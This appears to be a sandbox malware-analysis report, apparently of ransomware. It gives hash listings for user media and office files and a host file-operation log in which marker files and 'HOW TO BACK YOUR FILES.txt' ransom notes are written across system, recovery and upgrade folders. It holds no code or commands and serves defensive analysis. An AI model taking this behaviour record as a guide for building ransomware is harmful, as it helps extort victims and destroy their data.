SHA256: 92bcf274a28ac51d334b922083ad1b61d9aa3e6b019b28568439e3b84fb9b96b
SSDeep: 768:5ahpayoZBGC9ScIlCB3EPNxF4UCpojruKtc88J7GQD/5oK+oITc2PH0sXN/PSGZO:5Wpa78CMZ0B3E1HiojAwQDhQ0s9/aGZO
False
C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\b1MCgDF7JU.wav 61.06 KB MD5: a96c2cf9bb632d930d4c50f1e8fc9c71
SHA1: 5f286540310589c50b85ff70140dcf0f6a4acd97
SHA256: 295adf26025eee3e38fdc3d919c5840f6ae9972d4c0a3fb9227e2705bdd46ccb
SSDeep: 1536:qXus9ZGpI7VKi0algZVGcKYlL/ndWPHpGfX:ous9FtCZNKY/FX
False
C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\RZMqfkHjGC7Ywnfi.wav 77.00 KB MD5: 0a796ed74d2cd57b6056e75f4895c7f6
SHA1: ca158da19b58e9efcc6b2dca9564440b3a2a03c7
SHA256: 217afdd11ab5c2f90e9a937957742faef8a1c75a3a76d10d59f8c0cd9b3caa04
SSDeep: 1536:M84wAljc+fVG5TaMlB1f8bgWE64quJdrzvjfeTl:MLAMV6B1kkWEhq2vjfa
False
C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\_9r81igxQbjAOcgmhEV.wav 12.64 KB MD5: eacc4472f0d4cd0e060f4008f90254bb
SHA1: fa0f85f8d72bfba67b499c31698b5a0fae854ebd
SHA256: 19ff4cb31a686fef6009bae258bae4b1950b7b179b9c8336140fc5f8f0d603a9
SSDeep: 192:JIAYFqWSOaZK2Wzm1etkVqRpdZ2ZLUOvdRr6/8wdujQorx83bR0DY0JxAAh8:JrWgKZzm2kVopK1z3O/8wAQKK+J+
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\2FpKVPISO.mp3 97.33 KB MD5: c837e7f21f2e4eb5cccbf62e564cc82c
SHA1: 2b71fad7d1bea63774b280e7ec62d8900e0e4aa9
SHA256: 6ea495c19b1bb882dac1c89e10e67ace231f990251a7b4918006190120e0edb3
SSDeep: 3072:i/KZvSTc+q1b9jwdfK+G4F1JS+R4civTV:iiUc+q19jwdO4pirV
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\5pycqsYyh9jtXU4a.mp3 28.72 KB MD5: 4808a5f80066f06cdf8d9f222f2cc1ac
SHA1: 18996733f9c5c63c9806a6a72eb8b6a03c417bf1
SHA256: 31b4d06a1cdb05264c7301f78ecba6b5c9b200146e86c91b73bab2e35d262164
SSDeep: 768:il9TrQcARTEh5udJqSvo/pqF/do/w79SQCkslXpp:il9w7Q8/nWE1dz79SQCBlL
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\926rqjMJjcledBP-.m4a 75.09 KB MD5: f7a2b19b2a8734e915035e129c5220bc
SHA1: a6279a6b38a14c1ee7f034c790536226132c912b
SHA256: a997b30f741a9822f49aad05bc3d9071f10fb68036956ecf4b2117a24bafcf0b
SSDeep: 1536:golhNrsiim+2/MV0hr31CNwFTKu7Yk+YbZ579/peqoC38:gofN1656JCNsTNYk+YtZ9/pePQ8
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\H9vaiExm-o.mp3 85.92 KB MD5: 6546453c6245892413a338079f1e0a2f
SHA1: e6dbfb5729e858cac328fbef8d99817eabafee43
SHA256: 045cefdfdf5ed42cb8a8a609a76bfef16191b6bbf48f25d21e64471a3f4d7273
SSDeep: 1536:0+WvI9+TDzOy8vNyqaLoEV7d2Q4D7dVbenIUFALPDXRwGpo8w2YUkrQ7q:RuI9gDzOy8j0oG7d2QC7elQ7BThwfue
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\OUfb1R.wav 52.53 KB MD5: 7f0e450f7cd4b071c5270feffc857f8e
SHA1: 77ccf5cca01b162add93ac86be9d4a3c810242da
SHA256: f37b9ce87e23e755d8b5b27611a8678b04a2d8164ddc9fb432e4c243e9434f63
SSDeep: 1536:uwAZHKRQZaok74QQ+5CorAhFUE4Ic1iqMsJ6X3yHn:4Fk174QjtOc1bMs8X3u
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\u3Lej26cURF7pFaUavmI.wav 78.00 KB MD5: 492f511bca4ec5d21a65f0f0d0daf893
SHA1: cf55013ad40925713d79d085f14d0cafaea5f9b3
SHA256: 3aff39a431338ea733e7e9abc765d02c059fd7b4b8da7ad2659705a0358cdeaa
SSDeep: 1536:5WtQcAeEalrTMTtsPCXTJ3azHKnoZu6ZPTkEUrSl1Us7I+6PQ68veY:0QcnfmwAajzZu6RGwL7t6P5BY
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\X9wKF.m4a 30.41 KB MD5: f3a14833b56d7e8eb241f055ba5dccbc
SHA1: db74ad3ac8522169fa3a0cc5161204f5172b7da8
SHA256: 1e381f4e2046bf59fb1ae257c43aec09630e12fa07e2a012c2198a4e292640f7
SSDeep: 768:JR+hsz7cbVmlV27pzDrIWGNEEOdSWtT2Kyja87OYfjMf9IAOTKBjfe:Qxmgpz/IP6lNea872IAOd
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Ylq3.m4a 57.16 KB MD5: 438d0f328e62e79a58de14ba3c0beb4f
SHA1: 66eeee65e54b3ff2db59e03de4e663ff7a8c47c3
SHA256: dc2ba5e94434ca3969e6095dab3542addf4d48c6a7ac391b5cfe6b76b6bfe563
SSDeep: 1536:hdwtaFG0AuBgz9loEAmHvVGD3PbYS1OqzLet:hdLFAh9GzmP4f4qW
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\cJ70uWo2V.m4a 51.03 KB MD5: 8e249ed0cd8f6efed56d63f3aafd5242
SHA1: 61a2e45d0a1c53c7f10f026975d6184493bcada7
SHA256: 0ec339411e1aa3e5e907289507ff2c956ae6a34d8206be1e49cb26b1fa8040c4
SSDeep: 1536:rRYQyTQcwRxjW9Lt0jn+on9JIZbIx2lufY/:rKQnzxjctPuJIxIkofY/
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\gNF41DnE96kMsiC.mp3 16.94 KB MD5: c31286358cf0c09b1ec97514364fb932
SHA1: 63de974454e1e14c62518e3162245297fdf69eb3
SHA256: 0fd0fe2c28f70b184afd5c1428c8f6ce9a7e21e1f9662ec9a24b929053702405
SSDeep: 384:GkavWQ/Siau4UNXA0GaJ5i0/cR/p3/iWmVihd6Im52Hd56:IWWRV7i0UR/p3/iWpwl52956
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\Z2GhDV1FaIXkNy.m4a 37.78 KB MD5: 4a8758ca3c23d7b028601bf9e656d503
SHA1: ed30bf63ccc39363cc8f839134fe4daa9caa3683
SHA256: fda6616b4f7476a1e7ba2b38e440a8a072a2b3eca8f408c932634b20fdf92d4f
SSDeep: 768:CsbkrwFgbqS6nQlyNXx/sjtK46NkvRWmWCB1duOAYlKdX/4AWd6P6mOhlGAIRy:CDr0S6Qux/hpWbDDVlKdX90vmOhQA7
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\9oZvTZiqj1T2ND.wav 56.14 KB MD5: 31f8719f39172bdb6b70f731c171f1ff
SHA1: 828358bca3b7c9600a1a901032717964df2dfde6
SHA256: ddbe89bfeeee499be6db7008ba468b00b54a9ce674f84c999da2a5680aa893f5
SSDeep: 768:t/TzQwpZSbpkdg2t1iURZW7L2Q19U2JBMQqd5Wb3nA3JmPQNa0Et3czUJUm0A4j2:dSt/SU+ZW7DbpwcnA5mPWzUmD+YZ2ND
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\osWp2.mp3 83.12 KB MD5: dfaf00ec54f625fac97fd8b91edf2df8
SHA1: 8704506c952b73dad80634174c7adcb0a9c56a8f
SHA256: d1bdc82e8e463b270fbb57f3e75c8f1ea311ceca57716311d1dd5ffb3f69dcaa
SSDeep: 1536:WqWrsVa7oNuZ8II8MMbO3fE8QbaJoL5UjMFJa5gebKCtugwz9UB5:ZRa0NuVSLwLeQq5HbK9gE9UD
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\U_ga_WJrGJ-jDmjIG.wav 98.00 KB MD5: 4199fd9e25f3e984fdc1cc6cbc82bb8d
SHA1: 6578948c1406b23fb8e33088a60e778f5b7fe23e
SHA256: 497c895cb260cd688736fcdfa6e784e23f589861f5cae0eda8c525d3724b840a
SSDeep: 1536:SyTgZ69y2h7DbHv3c5ikwgLDnp0Zy9FR2eqQW/jf4mCgQu0Yu6Ho0Pi/xtFzvNT0:vy6Pv4GgLDp0g9Cv/jg3X6UFrLjFv1iJ
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\fRm4zP.wav 59.25 KB MD5: 2334440916611a96179d4bbcb6abf51e
SHA1: 6dbb6f65384d27136ed749c2cd6560c7d80fd5ee
SHA256: 812b6e90682fa0c21dd79c843906085d38d42dc9c642422c4dcc09ae52a5ed81
SSDeep: 1536:1WuV7ad8ub+RGjQ3YC/gigrY21GpiDOuEe8eCqfO:4qGyW+oc3YXYZcfO
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\FSplmPyv3.m4a 99.17 KB MD5: e9c384a094a6b13c2e89d1f0d2ba7cb9
SHA1: 4eda15f487b2e7d7eaa0ea97a963de057a6e9f27
SHA256: ba034477ba1ffdb838ed7a4825f2670c6b831e3a348410837884a80c0228aa35
SSDeep: 1536:S6h1PEXilkcZvDyPkTyfJCKJRaG3a93K+O2ulxTfnnIA+EmYkbR1I8TJ:S6gilbDyscFj3uaDfnIA+DrF1tN
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\YWaVCyXnxBoBbdx.m4a 81.47 KB MD5: 6ef96e0e8891dee26325cb984c4011fb
SHA1: f36fa9e34dbbdc9d47fa7c8a5e2346433f8b8a58
SHA256: ed209675e86b10c0d1d898e7d460761838b2bbe19996d98556a078cb9d0adb36
SSDeep: 1536:6cHR5cPA3ROaNJ5lV4UbqEVcW9Xpg4IVKq+EVAClDy2slejjfA585nnead:6STr4UuEVcWd1wh+XClDyDcjuUnnek
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\_MbUJDIbnNB86DdwXKQn.wav 67.08 KB MD5: bafa16b8e45fb9edb5c6c28939a19305
SHA1: 3730d7044ebc0e7af2d4e97d3ca12661a37ed560
SHA256: 32c67c4869417af7aaa51dc154a373d8f51d1be7ec5f4b2ef24a5b13184bda1f
SSDeep: 1536:cE9KLL1VvBJVckXsoq4k+BeWGkdv10tr6c7WGjMd7Hugd:0LLTBJVU344WhF1c6c6GjMdBd
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\geOqCbV8uwQiJY9.mp3 19.67 KB MD5: 3e3dd5d66ec75b98c54f3d554139d7d6
SHA1: 2233fa469ae4e1077d92e8a540d365108b196996
SHA256: 143edde86cc1d836ce523b50f0b804e1c09c71ac235cc20549bd8124b8d98288
SSDeep: 384:Qbmt1YsRQDsTppDtPYHIsVO7t805m3nSY1uLdqmpPGtA:QSt1lHDFYHTO7t84IzSXeW
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\PKDoJjf.mp3 54.88 KB MD5: 9e5eaf17d02143afa3d8f50d7ca1d59f
SHA1: 585db4868a4abdbd08582886ffecb456d7252f57
SHA256: 1f769c16dbb4c733c518780996719da6aca38deebd4053cc89aac65af92661f6
SSDeep: 1536:TNB2LxSsbrAQz3lJc3+ve0wtCAeOP+hro9F7Yg:TNqxzAQzTS+MTdMroz3
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\vRwHl.m4a 38.09 KB MD5: 2873d0b44a9154a4b7b77ba9b6d72b6f
SHA1: 796df684dcc8671f182fb1c6084ebb7085438869
SHA256: fae8aeb72c29a1398fa30e81b5c318d86c95e3b11bbf74119c43ed3a35345f78
SSDeep: 768:J1hh2RAg3axb2uqjVMI3/mcUPE0scjRkoY/hRnGsqOGNjGuOPvLSo85Wj+sJt:JjhBhatjVMI3/mcUPpskWoY5RnGECGbL
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\D1biJ0M12k7D5tV.mp3 7.34 KB MD5: bedba0e8feeb22b52e19a3beea77c13b
SHA1: 7063665b64a02cb21d4e5a359d52b11c1f9eb61b
SHA256: 4f612b53cd1b42cccb7965d9d9d5e4e5884ef16b6506980d62273aa93c7c2f47
SSDeep: 192:lT9XaZpAkpZdI91rteSat0WWjX54U4uj/m5LALh8:lT9KZzvk1h4WjXqULAsq
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\FGCqab 6Q9IrvSbP.mp3 80.91 KB MD5: 1db2d2fe74e15f112e1d2b560278410a
SHA1: 9873ea8966bb68aa1ad2476f54a75c5ab26d23be
SHA256: 17332047a7bbfab591fc2c8af7463318ff0d932667317f1036913103dcd6b3a6
SSDeep: 1536:MmpKT5vpAPhFFc8X9Kz6H/rexMg7MJQFUoGeneqiO:MmyvpAbC8X9Kzhmkdqm6O
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\Oddm UVF74ixYdV9S.m4a 75.27 KB MD5: c4c2c48252e2b75283a16d51cd6acaed
SHA1: 7b75cabaaf03fb8407e3de9b9d2e2048cfd52c3f
SHA256: fc1fc1d5f7a9e529be4ca58a2522c41de025fa559d4a771663d3b941bfb0f45d
SSDeep: 1536:lHSkEmehPB4Oc+luSXNi1D+vzNDlUmV1ulOll8R8lydqpjSOuqDNxFaDZ8r:ltEvESXkwbZlUs1ulOllC8lO5OuqBx8E
False
C:\Users\FD1HVy\Favorites\Bing.url 976 bytes MD5: fd6f06b275927c9352289bce2cf59070
SHA1: a0e291f43a6891d8a080392ad233f4b8076ef9a5
SHA256: d63133369e64e23c1bdcd43818e113b82147346569e8a3dcbc75ff4c8bdcbec0
SSDeep: 24:389Tox48pCKJ1ap9CiBvN/r1+JO7ad/gv6B5z67c:s9448pnaxRr1kO+6zo
False
C:\Users\FD1HVy\Documents\3 jiOxfC.xlsx 36.45 KB MD5: 264a50913a98534c4a76637ddd6d834a
SHA1: 6296fb8004ada7c186b6ebd41a73a7a0f260d8e4
SHA256: 42d466b931d964c1dd950f718d6d4ac85a5fce5149329fa0e7da858f8d19b988
SSDeep: 768:1fT5eRjbEFrAcHNA7Po8RFLmEMS43OCaVFOiZOM9CHpDyijW:1b54EFrzHNA7ruj3gV8i4k
False
C:\Users\FD1HVy\Documents\cuZF8zNtkH1ph ibNaP.docx 74.75 KB MD5: 431b2ae88d66f6dd2624d86e9f0f750f
SHA1: 2c5095b86127604f4e28b8dcf8ab736c56f7a8ff
SHA256: a3a42ece8dc888c9da040e57f3ebcbce26283b7a5a011119568c720d2061d607
SSDeep: 1536:C0+UhxegvOXs0LIee2yvER1iyJRmMVP1O+dgUmpxi9eEL4gs3YVZAbC:T+UXeuOXsHELXx/ndDmpxg4gs3AZAe
False
C:\Users\FD1HVy\Documents\Database1.accdb 340.75 KB MD5: e2e8f44740910e3d456a3ee1654e9bd7
SHA1: 744cf7d28dfd8bccae0fc6025c5f11abe7a0763e
SHA256: c1a87c2092223220220a6e8131b9d6ec3d3539b686640a0e0ff0a40505594d9a
SSDeep: 6144:fQu46jAB4NB8f1E4eXg0MfSF4TnwdIAhCHhZxM+L1Pvgm7gbXXb3awii0UJlb/4Q:4unBB69Eg9SPIkCHhZuuPvgm7gzbaw3X
False
Host Behavior
File (2006)
»
Operation Filename Additional Information Success Count Logfile
Create C:\ProgramData\local\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\ProgramData\local\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\ProgramData\share\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\ProgramData\share\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\ids.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Z:\System Volume Information\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\System Volume Information\tracking.log desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\System Volume Information\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\Recovery\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create Z:\Recovery\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\WindowsRE\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\BOOTNXT desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\BOOTSECT.BAK desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Desktop\ids.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH, share_mode = FILE_SHARE_READ True 2
Fn
Create C:\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\2052\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\bootsect.exe desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\WindowsRE\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create Z:\Recovery\WindowsRE\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\WindowsRE\boot.sdi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\DW20.EXE desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\WindowsRE\ReAgent.xml desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\WindowsRE\Winre.wim desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\DWTRIG20.EXE desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\EnableWiFiTracing.cmd desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\GatherOSState.EXE desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\GetCurrentRollback.EXE desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\HttpHelper.exe desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\PostOOBEScript.cmd desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\upgrader_default.log desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\upgrader_win10.log desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\Windows10UpgraderApp.exe desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\WinREBootApp32.exe desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\WinREBootApp64.exe desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\hwcompatShared.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\WindowsRE\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
